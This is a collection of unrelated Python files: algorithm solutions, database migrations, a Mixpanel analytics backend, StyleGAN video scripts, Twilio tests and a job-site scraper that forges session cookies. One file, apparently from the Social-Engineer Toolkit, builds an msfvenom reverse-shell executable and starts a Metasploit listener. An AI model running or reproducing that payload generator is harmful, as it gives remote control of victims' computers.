from .resultsmontage import results_montage
from .sortedcolormontage import create_sorted_color_montage
from .colorutils import color_histogram
from .colorutils import get_dominant_color
|
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the stepPerms function below.
def stepPerms(n, m=3):
    # For each composition of n into step sizes 1..m, count its distinct
    # orderings with a product of binomial coefficients, and sum them all.
    tot = 0
    for x in rec(n, m):
        ways = 1
        i = 0
        l = 0
        while i < m:
            if x[1] > 0:
                l += x[1]
                # multiply by C(l, x[1]); integer division keeps this exact
                # for large n (true division would lose float precision)
                ways *= math.factorial(l) // (math.factorial(l - x[1]) * math.factorial(x[1]))
            x = x[3]
            i += 1
        tot += ways
    return tot % 10000000007
def rec(n, m):
    # Enumerate the step-size counts: each entry is [n, i, m, tail], where i
    # is the number of size-m steps and tail decomposes the remainder into
    # smaller steps; size-1 steps absorb whatever is left.
    res = []
    a = n // m
    i = 0
    if m == 1:
        res.append([n, n, m, []])
    else:
        while i <= a:
            r = n - i * m
            for x in rec(r, m - 1):
                res.append([n, i, m, x])
            i += 1
    return res
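# Sanity checks (the counts follow the tribonacci sequence):
# stepPerms(1) == 1, stepPerms(3) == 4, stepPerms(4) == 7, stepPerms(5) == 13.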
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
s = int(input())
for s_itr in range(s):
n = int(input())
res = stepPerms(n)
fptr.write(str(res) + '\n')
fptr.close()
|
import sys
import os
# import current path
projectFolder = os.path.dirname(__file__)
if projectFolder not in sys.path:
sys.path.append(projectFolder)
# attach debugger
from lib.sdk.debugger import *
pydev_path = "JetBrains/Toolbox/apps/PyCharm-P/ch-0/192.6262.63/helpers/pydev"
debug(pydev_path)
import loader
reload(loader)
import model.configuration
reload(model.configuration)
import controller.configurationItemView
reload(controller.configurationItemView)
loader.run()
|
import numpy as np
from . import charminv
class Harminv(charminv.Harminv):
threshold = {'error': 0.1,
'relative_error': np.inf,
'amplitude': 0.0,
'relative_amplitude': -1.0,
'Q': 10.0
}
def compute_threshold(self, inrange=False):
rel_amp = self.amplitude.max() * self.threshold['relative_amplitude']
rel_err = self.error.min() * self.threshold['relative_error']
ok = (((not inrange) |
((self.fmin < self.freq) & (self.fmax > self.freq)))
& (self.error <= self.threshold['error'])
& (self.error <= rel_err)
& (self.amplitude >= self.threshold['amplitude'])
& (self.amplitude >= rel_amp)
& (np.abs(self.Q) > self.threshold['Q']))
return ok
@property
def modes(self):
t = np.arange(self.signal.size) * self.dt
return self.compute_modes(t)
def compute_modes(self, time):
modes = self.amplitude * np.exp(-1j * (2 * np.pi * self.freq
* time[None].T - self.phase)
- self.decay * time[None].T)
return modes.T
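    # Note: the modes sum back (approximately) to the analysed signal, e.g.
    # harm.modes.sum(axis=0).real should be close to harm.signal for a
    # well-resolved inversion.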
def invert(signal, fmin, fmax, dt=1, nf=100):
"""Compute the *Harmonic Inversion* of the given signal.
Returns a numpy recarray, with the results of the inversion
available as attributes.
Usage:
import harminv
tau = 2 * np.pi
time = np.linspace(0, 1, 1000)
signal = np.cos(12 * tau * time) + np.cos(5 * tau * time)
inversion = harminv.invert(signal, fmin=2, fmax=100, dt=0.001)
# access the frequencies
inversion.frequency
# access the amplitudes
      inversion.amplitude
# reconstruct the signal
components = (inversion.amplitude
* np.exp(-1j * (2 * np.pi
* inversion.frequency
* time[:, None] - inversion.phase)
- inversion.decay * time[:, None]))
reconstruction = components.sum(axis=1)
"""
harm = Harminv(signal, fmin=fmin, fmax=fmax, dt=dt, nf=nf)
array_names = [(harm.freq, 'frequency'),
(harm.amplitude, 'amplitude'),
(harm.phase, 'phase'),
(harm.decay, 'decay'),
(harm.Q, 'Q'),
(harm.error, 'error')]
arrays, names = zip(*array_names)
return np.rec.fromarrays(arrays, names=names)
|
"""Add ProjectOption
Revision ID: 1d1f467bdf3d
Revises: 105d4dd82a0a
Create Date: 2013-11-20 16:04:25.408018
"""
# revision identifiers, used by Alembic.
revision = '1d1f467bdf3d'
down_revision = '105d4dd82a0a'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.create_table(
'projectoption',
sa.Column('id', sa.GUID(), nullable=False),
sa.Column('project_id', sa.GUID(), nullable=False),
sa.Column('name', sa.String(length=64), nullable=False),
sa.Column('value', sa.Text(), nullable=False),
sa.Column('date_created', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['project_id'], ['project.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('project_id', 'name', name='unq_projectoption_name')
)
def downgrade():
op.drop_table('projectoption')
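# To apply or revert this migration with the standard Alembic CLI:
#     alembic upgrade 1d1f467bdf3d
#     alembic downgrade 105d4dd82a0a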
|
"""https://leetcode.com/problems/maximum-depth-of-binary-tree/
Examples:
>>> Solution().maxDepth(None)
0
"""
from typing import Optional
from pytudes._2021.utils import binary_tree
# Definition for a binary tree node.
# class TreeNode:
# def __init__(
# self, val: int = 0, left: "TreeNodeType" = None, right: "TreeNodeType" = None
# ):
# self.val = val
# self.left = left
# self.right = right
#
TreeNodeType = Optional[binary_tree.TreeNode]
class Solution:
def maxDepth(self, root: TreeNodeType) -> int:
return max_depth(root)
def max_depth(root: TreeNodeType) -> int:
"""
Args:
root: TreeNode root of a binary tree
Returns: depth of the binary tree rooted at `root`
Examples:
>>> max_depth(binary_tree.build_tree([3,9,20,None,None,15,7]))
3
>>> max_depth(binary_tree.build_tree([1,None,2]))
2
>>> max_depth(binary_tree.build_tree([0]))
1
>>> max_depth(binary_tree.build_tree([]))
0
"""
## BASE CASE ##
if not root:
return 0
"""ALGORITHM"""
## RECURSIVE CASE ##
return 1 + max(max_depth(root.left), max_depth(root.right))
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from cubes.model import Cube, create_dimension
from cubes.model import aggregate_list
from cubes.browser import *
from cubes.stores import Store
from cubes.errors import *
from cubes.providers import ModelProvider
from cubes.logging import get_logger
from .mixpanel import *
from .mapper import cube_event_key
from string import capwords
import json
import pkgutil
import time
import pytz
DIMENSION_COUNT_LIMIT = 100
DEFAULT_TIME_HIERARCHY = "ymdh"
MXP_TIME_DIM_METADATA = {
"name": "time",
"role": "time",
"levels": [
{ "name": "year", "label": "Year" },
{ "name": "month", "label": "Month", "info": { "aggregation_units": 3 }},
{ "name": "day", "label": "Day", "info": { "aggregation_units": 7 } },
{ "name": "hour", "label": "Hour", "info": { "aggregation_units": 6 } },
{ "name": "week", "label": "Week", "info": { "aggregation_units": 4 } },
{ "name": "date", "label": "Date", "info": { "aggregation_units": 7 } }
],
"hierarchies": [
{"name": "ymdh", "levels": ["year", "month", "day", "hour"]},
{"name": "wdh", "levels": ["week", "date", "hour"]}
],
"default_hierarchy_name": "ymdh",
"info": {"is_date": True}
}
MXP_AGGREGATES_METADATA = [
{
"name": "total",
"label": "Total"
},
{
"name": "total_sma",
"label": "Total Moving Average",
"function": "sma",
"measure": "total"
},
{
"name": "unique",
"label": "Unique"
},
{
"name": "unique_sma",
"label": "Unique Moving Average",
"function": "sma",
"measure": "unique"
},
]
_time_dimension = create_dimension(MXP_TIME_DIM_METADATA)
def _mangle_dimension_name(name):
"""Return a dimension name from a mixpanel property name."""
fixed_name = name.replace("$", "_")
fixed_name = fixed_name.replace(" ", "_")
return fixed_name
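# For example, _mangle_dimension_name("$browser version") returns
# "_browser_version".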
class MixpanelModelProvider(ModelProvider):
def __init__(self, *args, **kwargs):
super(MixpanelModelProvider, self).__init__(*args, **kwargs)
# TODO: replace this with mixpanel mapper
# Map properties to dimension (reverse mapping)
self.property_to_dimension = {}
self.event_to_cube = {}
self.cube_to_event = {}
mappings = self.metadata.get("mappings", {})
# Move this into the Mixpanel Mapper
for name in self.dimensions_metadata.keys():
try:
prop = mappings[name]
except KeyError:
pass
else:
self.property_to_dimension[prop] = name
for name in self.cubes_metadata.keys():
try:
event = mappings[cube_event_key(name)]
except KeyError:
pass
else:
self.cube_to_event[name] = event
self.event_to_cube[event] = name
def default_metadata(self, metadata=None):
"""Return Mixpanel's default metadata."""
model = pkgutil.get_data("cubes.backends.mixpanel", "mixpanel_model.json")
metadata = json.loads(model)
return metadata
def requires_store(self):
return True
def public_dimensions(self):
"""Return an empty list. Mixpanel does not export any dimensions."""
return []
def cube(self, name, locale=None):
"""Creates a mixpanel cube with following variables:
* `name` – cube name
* `measures` – cube measures: `total` and `uniques`
* `dimension_links` – list of linked dimension names
* `mappings` – mapping of corrected dimension names
Dimensions are Mixpanel's properties where ``$`` character is replaced
by the underscore ``_`` character.
"""
params = {
"event": self.cube_to_event.get(name, name),
"limit": DIMENSION_COUNT_LIMIT
}
result = self.store.request(["events", "properties", "top"], params)
if not result:
raise NoSuchCubeError("Unknown Mixpanel cube %s" % name, name)
try:
metadata = self.cube_metadata(name)
except NoSuchCubeError:
metadata = {}
options = self.cube_options(name)
allowed_dims = options.get("allowed_dimensions", [])
denied_dims = options.get("denied_dimensions", [])
dims = ["time"]
mappings = {}
for prop in result.keys():
try:
dim_name = self.property_to_dimension[prop]
except KeyError:
dim_name = _mangle_dimension_name(prop)
# Skip not allowed dimensions
if (allowed_dims and dim_name not in allowed_dims) or \
(denied_dims and dim_name in denied_dims):
continue
if dim_name != prop:
mappings[dim_name] = prop
dims.append(dim_name)
aggregates = aggregate_list(MXP_AGGREGATES_METADATA)
label = metadata.get("label", capwords(name.replace("_", " ")))
category = metadata.get("category", self.store.category)
cube = Cube(name=name,
aggregates=aggregates,
label=label,
description=category,
info=metadata.get("info"),
dimension_links=dims,
store=self.store,
mappings=mappings,
category=category)
cube.info["required_drilldowns"] = ["time"]
return cube
def dimension(self, name, locale=None, templates=[]):
if name == "time":
return _time_dimension
try:
metadata = self.dimension_metadata(name)
except NoSuchDimensionError:
metadata = {"name": name}
return create_dimension(metadata)
def list_cubes(self):
result = self.store.request(["events", "names"], {"type": "general", })
cubes = []
for event in result:
name = self.event_to_cube.get(event, event)
try:
metadata = self.cube_metadata(name)
except NoSuchCubeError:
metadata = {}
label = metadata.get("label", capwords(name.replace("_", " ")))
category = metadata.get("category", self.store.category)
cube = {
"name": name,
"label": label,
"category": category
}
cubes.append(cube)
return cubes
class MixpanelStore(Store):
related_model_provider = "mixpanel"
def __init__(self, api_key, api_secret, category=None, tz=None, **options):
super(MixpanelStore, self).__init__(**options)
self.mixpanel = Mixpanel(api_key, api_secret)
self.category = category or "Mixpanel Events"
if tz is not None:
tz = pytz.timezone(tz)
else:
tz = pytz.timezone(time.strftime('%Z', time.localtime()))
self.tz = tz
self.logger = get_logger()
def request(self, *args, **kwargs):
"""Performs a mixpanel HTTP request. Raises a BackendError when
mixpanel returns `error` in the response."""
self.logger.debug("Mixpanel request: %s" % (args,))
try:
response = self.mixpanel.request(*args, **kwargs)
except MixpanelError as e:
raise BackendError("Mixpanel request error: %s" % str(e))
return response
|
#!/usr/bin/env python3
import py_trees
blackboard = py_trees.blackboard.Client(name="Global")
parameters = py_trees.blackboard.Client(name="Parameters", namespace="parameters")
blackboard.register_key(key="foo", access=py_trees.common.Access.WRITE)
blackboard.register_key(key="/bar", access=py_trees.common.Access.WRITE)
blackboard.register_key(key="/parameters/default_speed", access=py_trees.common.Access.WRITE)
parameters.register_key(key="aggressive_speed", access=py_trees.common.Access.WRITE)
blackboard.foo = "foo"
blackboard.bar = "bar"
blackboard.parameters.default_speed = 20.0
parameters.aggressive_speed = 60.0
miss_daisy = blackboard.parameters.default_speed
van_diesel = parameters.aggressive_speed
print(blackboard)
print(parameters)
|
# -*- coding: utf-8 -*-
#
# Copyright 2018 Data61, CSIRO
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Utility functions for the movielens-recommender demo
"""
from numba import jit
import numpy as np
import pandas as pd
import networkx as nx
import os
@jit(nopython=True)
def remap_ids(data, uid_map, mid_map, uid_inx=0, mid_inx=1):
"""
Remap user and movie IDs
"""
Nm = mid_map.shape[0]
Nu = uid_map.shape[0]
for ii in range(data.shape[0]):
mid = data[ii, mid_inx]
uid = data[ii, uid_inx]
new_mid = np.searchsorted(mid_map, mid)
new_uid = np.searchsorted(uid_map, uid)
if new_mid < 0:
print(mid, new_mid)
# Only map to index if found, else map to zero
if new_uid < Nu and (uid_map[new_uid] == uid):
data[ii, uid_inx] = new_uid + Nm
else:
data[ii, uid_inx] = -1
data[ii, mid_inx] = new_mid
def ingest_graph(data_path, config):
"""Ingest a graph from user-movie ratings"""
edgelist_name = os.path.join(data_path, config["input_files"]["ratings"])
columns = config["ratings_params"]["columns"]
usecols = config["ratings_params"]["usecols"]
sep = config["ratings_params"]["sep"]
header = config["ratings_params"].get("header")
# Load the edgelist:
ratings = pd.read_csv(
edgelist_name,
names=columns,
sep=sep,
header=header,
usecols=usecols,
engine="python",
dtype="int",
)
# Enumerate movies & users
mids = np.unique(ratings["mId"])
uids = np.unique(ratings["uId"])
# Filter data and transform
remap_ids(ratings.values, uids, mids)
# Node ID map back to movie and user IDs
movie_id_map = {i: "m_{}".format(mId) for i, mId in enumerate(mids)}
user_id_map = {i + len(mids): "u_{}".format(uId) for i, uId in enumerate(uids)}
id_map = {**movie_id_map, **user_id_map}
inv_id_map = dict(zip(id_map.values(), id_map.keys()))
# Create networkx graph
g = nx.from_pandas_edgelist(
ratings, source="uId", target="mId", edge_attr=True, create_using=nx.DiGraph()
)
# Add node types:
node_types = {inv_id_map["m_" + str(v)]: "movie" for v in mids}
node_types.update({inv_id_map["u_" + str(v)]: "user" for v in uids})
nx.set_node_attributes(g, name="label", values=node_types)
print(
"Graph statistics: {} users, {} movies, {} ratings".format(
sum([v[1]["label"] == "user" for v in g.nodes(data=True)]),
sum([v[1]["label"] == "movie" for v in g.nodes(data=True)]),
g.number_of_edges(),
)
)
return g, id_map, inv_id_map
def ingest_features(data_path, config, node_type):
"""Ingest fatures for nodes of node_type"""
filename = os.path.join(data_path, config["input_files"][node_type])
if node_type == "users":
parameters = config["user_feature_params"]
elif node_type == "movies":
parameters = config["movie_feature_params"]
else:
raise ValueError("Unknown node type {}".format(node_type))
columns = parameters.get("columns")
formats = parameters.get("formats")
usecols = parameters.get("usecols")
sep = parameters.get("sep", ",")
feature_type = parameters.get("feature_type")
dtype = parameters.get("dtype", "float32")
header = parameters.get("header")
# Load Data
data = pd.read_csv(
filename,
index_col=0,
names=columns,
sep=sep,
header=header,
engine="python",
usecols=usecols,
)
return data
def add_features_to_nodes(g, inv_id_map, user_features, movie_features):
"""Add user and movie features to graph nodes"""
movie_features_dict = {
k: np.array(movie_features.loc[k]) for k in movie_features.index
}
user_features_dict = {
k: np.array(user_features.loc[k]) for k in user_features.index
}
node_features = {}
for v in movie_features.index:
node_features.update({inv_id_map["m_" + str(v)]: movie_features_dict[v]})
for v in user_features.index:
node_features.update({inv_id_map["u_" + str(v)]: user_features_dict[v]})
nx.set_node_attributes(g, name="feature", values=node_features)
return g
|
from cognite.power.client import PowerClient
from cognite.power.data_classes import PowerAsset, PowerAssetList
from cognite.power.power_area import PowerArea
from cognite.power.power_corridor import PowerCorridor, PowerCorridorComponent
from cognite.power.power_graph import PowerGraph
|
# Generated by Django 3.0.7 on 2020-07-29 06:26
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('graphs', '0004_alabama_temperature_input'),
]
operations = [
migrations.CreateModel(
name='Temps',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.TextField()),
('temperature_input', models.IntegerField()),
],
),
migrations.RemoveField(
model_name='alabama',
name='temperature_input',
),
]
|
import math
import os
import pickle
import numpy as np
import PIL.Image
import scipy.ndimage
import moviepy.editor
from numpy import linalg
import dnnlib
import dnnlib.tflib as tflib
import config
def main():
tflib.init_tf()
# Load pre-trained network.
# url = 'https://drive.google.com/uc?id=1MEGjdvVpUsu1jB4zrXZN7Y4kBBOzizDQ'
# with dnnlib.util.open_url(url, cache_dir=config.cache_dir) as f:
## NOTE: insert model here:
_G, _D, Gs = pickle.load(open(config.Model, "rb"))
# _G = Instantaneous snapshot of the generator. Mainly useful for resuming a previous training run.
# _D = Instantaneous snapshot of the discriminator. Mainly useful for resuming a previous training run.
# Gs = Long-term average of the generator. Yields higher-quality results than the instantaneous snapshot.
grid_size = [2, 2]
image_shrink = 1
image_zoom = 1
duration_sec = 60.0
smoothing_sec = 1.0
mp4_fps = 20
mp4_codec = 'libx264'
mp4_bitrate = '5M'
random_seed = 404
mp4_file = 'results/random_grid_%s.mp4' % random_seed
minibatch_size = 8
num_frames = int(np.rint(duration_sec * mp4_fps))
random_state = np.random.RandomState(random_seed)
# Generate latent vectors
shape = [num_frames, np.prod(grid_size)] + Gs.input_shape[1:] # [frame, image, channel, component]
all_latents = random_state.randn(*shape).astype(np.float32)
all_latents = scipy.ndimage.gaussian_filter(all_latents,
[smoothing_sec * mp4_fps] + [0] * len(Gs.input_shape), mode='wrap')
all_latents /= np.sqrt(np.mean(np.square(all_latents)))
def create_image_grid(images, grid_size=None):
assert images.ndim == 3 or images.ndim == 4
num, img_h, img_w, channels = images.shape
if grid_size is not None:
grid_w, grid_h = tuple(grid_size)
else:
grid_w = max(int(np.ceil(np.sqrt(num))), 1)
grid_h = max((num - 1) // grid_w + 1, 1)
grid = np.zeros([grid_h * img_h, grid_w * img_w, channels], dtype=images.dtype)
for idx in range(num):
x = (idx % grid_w) * img_w
y = (idx // grid_w) * img_h
grid[y: y + img_h, x: x + img_w] = images[idx]
return grid
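    # For example, 4 images of shape (256, 256, 3) with grid_size [2, 2]
    # yield a single (512, 512, 3) grid.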
# Frame generation func for moviepy.
def make_frame(t):
frame_idx = int(np.clip(np.round(t * mp4_fps), 0, num_frames - 1))
latents = all_latents[frame_idx]
fmt = dict(func=tflib.convert_images_to_uint8, nchw_to_nhwc=True)
images = Gs.run(latents, None, truncation_psi=0.7,
randomize_noise=False, output_transform=fmt)
grid = create_image_grid(images, grid_size)
if image_zoom > 1:
grid = scipy.ndimage.zoom(grid, [image_zoom, image_zoom, 1], order=0)
if grid.shape[2] == 1:
grid = grid.repeat(3, 2) # grayscale => RGB
return grid
# Generate video.
video_clip = moviepy.editor.VideoClip(make_frame, duration=duration_sec)
video_clip.write_videofile(mp4_file, fps=mp4_fps, codec=mp4_codec, bitrate=mp4_bitrate)
####################################################################################################################
# # import scipy
# # coarse
# duration_sec = 60.0
# smoothing_sec = 1.0
# mp4_fps = 20
#
# num_frames = int(np.rint(duration_sec * mp4_fps))
# random_seed = 500
# random_state = np.random.RandomState(random_seed)
#
# w = 512
# h = 512
# # src_seeds = [601]
# dst_seeds = [700]
# style_ranges = ([0] * 7 + [range(8, 16)]) * len(dst_seeds)
#
# fmt = dict(func=tflib.convert_images_to_uint8, nchw_to_nhwc=True)
# synthesis_kwargs = dict(output_transform=fmt, truncation_psi=0.7, minibatch_size=8)
#
# shape = [num_frames] + Gs.input_shape[1:] # [frame, image, channel, component]
# src_latents = random_state.randn(*shape).astype(np.float32)
# src_latents = scipy.ndimage.gaussian_filter(src_latents,
# smoothing_sec * mp4_fps,
# mode='wrap')
# src_latents /= np.sqrt(np.mean(np.square(src_latents)))
#
# dst_latents = np.stack(np.random.RandomState(seed).randn(Gs.input_shape[1]) for seed in dst_seeds)
#
# src_dlatents = Gs.components.mapping.run(src_latents, None) # [seed, layer, component]
# dst_dlatents = Gs.components.mapping.run(dst_latents, None) # [seed, layer, component]
# src_images = Gs.components.synthesis.run(src_dlatents, randomize_noise=False, **synthesis_kwargs)
# dst_images = Gs.components.synthesis.run(dst_dlatents, randomize_noise=False, **synthesis_kwargs)
#
# canvas = PIL.Image.new('RGB', (w * (len(dst_seeds) + 1), h * 2), 'white')
#
# for col, dst_image in enumerate(list(dst_images)):
# canvas.paste(PIL.Image.fromarray(dst_image, 'RGB'), ((col + 1) * h, 0))
#
# def make_frame(t):
# frame_idx = int(np.clip(np.round(t * mp4_fps), 0, num_frames - 1))
# src_image = src_images[frame_idx]
# canvas.paste(PIL.Image.fromarray(src_image, 'RGB'), (0, h))
#
# for col, dst_image in enumerate(list(dst_images)):
# col_dlatents = np.stack([dst_dlatents[col]])
# col_dlatents[:, style_ranges[col]] = src_dlatents[frame_idx, style_ranges[col]]
# col_images = Gs.components.synthesis.run(col_dlatents, randomize_noise=False, **synthesis_kwargs)
# for row, image in enumerate(list(col_images)):
# canvas.paste(PIL.Image.fromarray(image, 'RGB'), ((col + 1) * h, (row + 1) * w))
# return np.array(canvas)
#
# # Generate video.
# import moviepy.editor
# mp4_file = 'results/interpolate.mp4'
# mp4_codec = 'libx264'
# mp4_bitrate = '5M'
#
# video_clip = moviepy.editor.VideoClip(make_frame, duration=duration_sec)
# video_clip.write_videofile(mp4_file, fps=mp4_fps, codec=mp4_codec, bitrate=mp4_bitrate)
#
####################################################################################################################
# import scipy
#
# duration_sec = 60.0
# smoothing_sec = 1.0
# mp4_fps = 20
#
# num_frames = int(np.rint(duration_sec * mp4_fps))
# random_seed = 503
# random_state = np.random.RandomState(random_seed)
#
# w = 512
# h = 512
# style_ranges = [range(6, 16)]
#
# fmt = dict(func=tflib.convert_images_to_uint8, nchw_to_nhwc=True)
# synthesis_kwargs = dict(output_transform=fmt, truncation_psi=0.7, minibatch_size=8)
#
# shape = [num_frames] + Gs.input_shape[1:] # [frame, image, channel, component]
# src_latents = random_state.randn(*shape).astype(np.float32)
# src_latents = scipy.ndimage.gaussian_filter(src_latents,
# smoothing_sec * mp4_fps,
# mode='wrap')
# src_latents /= np.sqrt(np.mean(np.square(src_latents)))
#
# dst_latents = np.stack([random_state.randn(Gs.input_shape[1])])
#
# src_dlatents = Gs.components.mapping.run(src_latents, None) # [seed, layer, component]
# dst_dlatents = Gs.components.mapping.run(dst_latents, None) # [seed, layer, component]
#
# def make_frame(t):
# frame_idx = int(np.clip(np.round(t * mp4_fps), 0, num_frames - 1))
# col_dlatents = np.stack([dst_dlatents[0]])
# col_dlatents[:, style_ranges[0]] = src_dlatents[frame_idx, style_ranges[0]]
# col_images = Gs.components.synthesis.run(col_dlatents, randomize_noise=False, **synthesis_kwargs)
# return col_images[0]
#
# # Generate video.
# import moviepy.editor
# mp4_file = 'results/fine_%s.mp4' % (random_seed)
# mp4_codec = 'libx264'
# mp4_bitrate = '5M'
#
# video_clip = moviepy.editor.VideoClip(make_frame, duration=duration_sec)
# video_clip.write_videofile(mp4_file, fps=mp4_fps, codec=mp4_codec, bitrate=mp4_bitrate)
def circular():
tflib.init_tf()
_G, _D, Gs = pickle.load(open(config.Model, "rb"))
rnd = np.random
latents_a = rnd.randn(1, Gs.input_shape[1])
latents_b = rnd.randn(1, Gs.input_shape[1])
latents_c = rnd.randn(1, Gs.input_shape[1])
def circ_generator(latents_interpolate):
radius = 40.0
latents_axis_x = (latents_a - latents_b).flatten() / linalg.norm(latents_a - latents_b)
latents_axis_y = (latents_a - latents_c).flatten() / linalg.norm(latents_a - latents_c)
latents_x = math.sin(math.pi * 2.0 * latents_interpolate) * radius
latents_y = math.cos(math.pi * 2.0 * latents_interpolate) * radius
latents = latents_a + latents_x * latents_axis_x + latents_y * latents_axis_y
return latents
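    # Note: circ_generator(0.0) and circ_generator(1.0) coincide (sin/cos of 0
    # and 2*pi), so the rendered video loops seamlessly.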
def mse(x, y):
return (np.square(x - y)).mean()
def generate_from_generator_adaptive(gen_func):
max_step = 1.0
current_pos = 0.0
change_min = 10.0
change_max = 11.0
fmt = dict(func=tflib.convert_images_to_uint8, nchw_to_nhwc=True)
current_latent = gen_func(current_pos)
current_image = Gs.run(current_latent, None, truncation_psi=0.7, randomize_noise=False, output_transform=fmt)[0]
array_list = []
video_length = 1.0
while current_pos < video_length:
array_list.append(current_image)
lower = current_pos
upper = current_pos + max_step
current_pos = (upper + lower) / 2.0
current_latent = gen_func(current_pos)
            current_image = \
                Gs.run(current_latent, None, truncation_psi=0.7, randomize_noise=False, output_transform=fmt)[0]
current_mse = mse(array_list[-1], current_image)
while current_mse < change_min or current_mse > change_max:
if current_mse < change_min:
lower = current_pos
current_pos = (upper + lower) / 2.0
if current_mse > change_max:
upper = current_pos
current_pos = (upper + lower) / 2.0
current_latent = gen_func(current_pos)
                    current_image = \
                        Gs.run(current_latent, None, truncation_psi=0.7, randomize_noise=False, output_transform=fmt)[0]
current_mse = mse(array_list[-1], current_image)
print("%s / %s : %s" % (current_pos, video_length, current_mse))
return array_list
frames = generate_from_generator_adaptive(circ_generator)
frames = moviepy.editor.ImageSequenceClip(frames, fps=30)
# Generate video.
mp4_file = 'results/circular.mp4'
mp4_codec = 'libx264'
mp4_bitrate = '3M'
mp4_fps = 20
frames.write_videofile(mp4_file, fps=mp4_fps, codec=mp4_codec, bitrate=mp4_bitrate)
if __name__ == "__main__":
main()
circular()
|
from __future__ import with_statement
import six
if six.PY3:
import unittest
else:
import unittest2 as unittest
from mock import Mock, patch
from twilio.rest.resources import AuthorizedConnectApps
from twilio.rest.resources import AuthorizedConnectApp
class AuthorizedConnectAppTest(unittest.TestCase):
def setUp(self):
self.parent = Mock()
self.uri = "/base"
self.auth = ("AC123", "token")
self.resource = AuthorizedConnectApps(self.uri, self.auth)
@patch("twilio.rest.resources.base.make_twilio_request")
def test_get(self, mock):
mock.return_value = Mock()
mock.return_value.content = '{"connect_app_sid": "SID"}'
self.resource.get("SID")
mock.assert_called_with("GET", "/base/AuthorizedConnectApps/SID",
auth=self.auth)
@patch("twilio.rest.resources.base.make_twilio_request")
def test_list(self, mock):
mock.return_value = Mock()
mock.return_value.content = '{"authorized_connect_apps": []}'
self.resource.list()
mock.assert_called_with("GET", "/base/AuthorizedConnectApps",
params={}, auth=self.auth)
def test_load(self):
instance = AuthorizedConnectApp(Mock(), "sid")
instance.load({
"connect_app_sid": "SID",
"account_sid": "AC8dfe2f2358cf421cb6134cf6f217c6a3",
"permissions": ["get-all"],
"connect_app_friendly_name": "foo",
"connect_app_description": "bat",
"connect_app_company_name": "bar",
"connect_app_homepage_url": "http://www.google.com",
"uri": "/2010-04-01/Accounts/",
})
        self.assertEqual(instance.permissions, ["get-all"])
        self.assertEqual(instance.sid, "SID")
        self.assertEqual(instance.friendly_name, "foo")
        self.assertEqual(instance.description, "bat")
        self.assertEqual(instance.homepage_url, "http://www.google.com")
        self.assertEqual(instance.company_name, "bar")
def test_delete(self):
with self.assertRaises(AttributeError):
self.resource.delete()
def test_create(self):
with self.assertRaises(AttributeError):
self.resource.create()
def test_update(self):
with self.assertRaises(AttributeError):
self.resource.update()
|
#!/usr/bin/env python
import subprocess
from src.core.setcore import *
from src.core.menu.text import *
from src.core.dictionaries import *
# definepath
definepath = os.getcwd()
sys.path.append(definepath)
# grab the metasploit path
meta_path = meta_path()
# here we handle our main payload generation
def payload_generate(payload, lhost, port):
# generate metasploit
subprocess.Popen(meta_path + "msfvenom -p %s LHOST=%s LPORT=%s --format=exe > %s/payload.exe" %
(payload, lhost, port, userconfigpath), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True).wait()
# write out the rc file
filewrite = open(userconfigpath + "meta_config", "w")
filewrite.write(
"use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\r\n\r\n" % (payload, lhost, port))
filewrite.close()
print_status(
"Payload has been exported to the default SET directory located under: " + userconfigpath + "payload.exe")
show_payload_menu2 = create_menu(payload_menu_2_text, payload_menu_2)
payload = (raw_input(setprompt(["4"], "")))
# if its default then select meterpreter
if payload == "":
payload = "2"
# assign the right payload
payload = ms_payload(payload)
lhost = raw_input(
setprompt(["4"], "IP address for the payload listener (LHOST)"))
port = raw_input(setprompt(["4"], "Enter the PORT for the reverse listener"))
# print to user that payload is being generated
print_status("Generating the payload.. please be patient.")
# generate the actual payload
payload_generate(payload, lhost, port)
# check options to see if we are using the infectious media generator
if check_options("INFECTION_MEDIA=") != "ON":
# start the payload for the user
payload_query = raw_input(setprompt(
["4"], "Do you want to start the payload and listener now? (yes/no)"))
if payload_query.lower() == "y" or payload_query.lower() == "yes":
print_status(
"Launching msfconsole, this could take a few to load. Be patient...")
subprocess.Popen(meta_path + "msfconsole -r " +
userconfigpath + "meta_config", shell=True).wait()
|
import logging
import math
import re
import time
import uuid
from datetime import datetime
from os import path
import requests
from config import Config
class Run(Config):
def __init__(self):
super(Run, self).__init__()
self.collection = self.Collection(__file__)
self.exploitUrl = 'https://www.lagou.com/gongsi/0-0-0.json'
        self.protocol = 'https'
self.host = 'www.lagou.com'
self.totalCount = 2000
self.pageSize = 16
self.key = 'companyId'
self.main()
def cookie(self):
now = datetime.now()
year = str(now.year)
month = str(now.month).rjust(2, "0")
day = str(now.day).rjust(2, "0")
hour = str(now.hour).rjust(2, "0")
minute = str(now.minute).rjust(2, "0")
second = str(now.second).rjust(2, "0")
try:
res = re.search("^JSESSIONID=([0-9A-Z]{32}).*$", requests.get("https://www.lagou.com").headers["Set-Cookie"]).group(1)
except Exception as e:
time.sleep(self.RandomLimit())
return self.cookie()
return "JSESSIONID=" + res + "; user_trace_token=" + year + month + day + hour + minute + second + "-" + "".join(str(uuid.uuid4()).split("-"))
def main(self):
cookie = self.cookie()
while True:
for num in range(1, int(math.ceil(self.totalCount / self.pageSize))):
try:
                    header = self.Header(self.protocol, self.host)
if num % 10 == 0:
cookie = self.cookie()
header["Cookie"] = cookie
requestBody = {"pn": num, "first": "false", "sortField": 0, "havemark": 0}
res = requests.post(self.exploitUrl, headers=header, timeout=60, data=requestBody)
response = res.json()
self.totalCount = int(response.get("totalCount"))
self.pageSize = int(response.get("pageSize"))
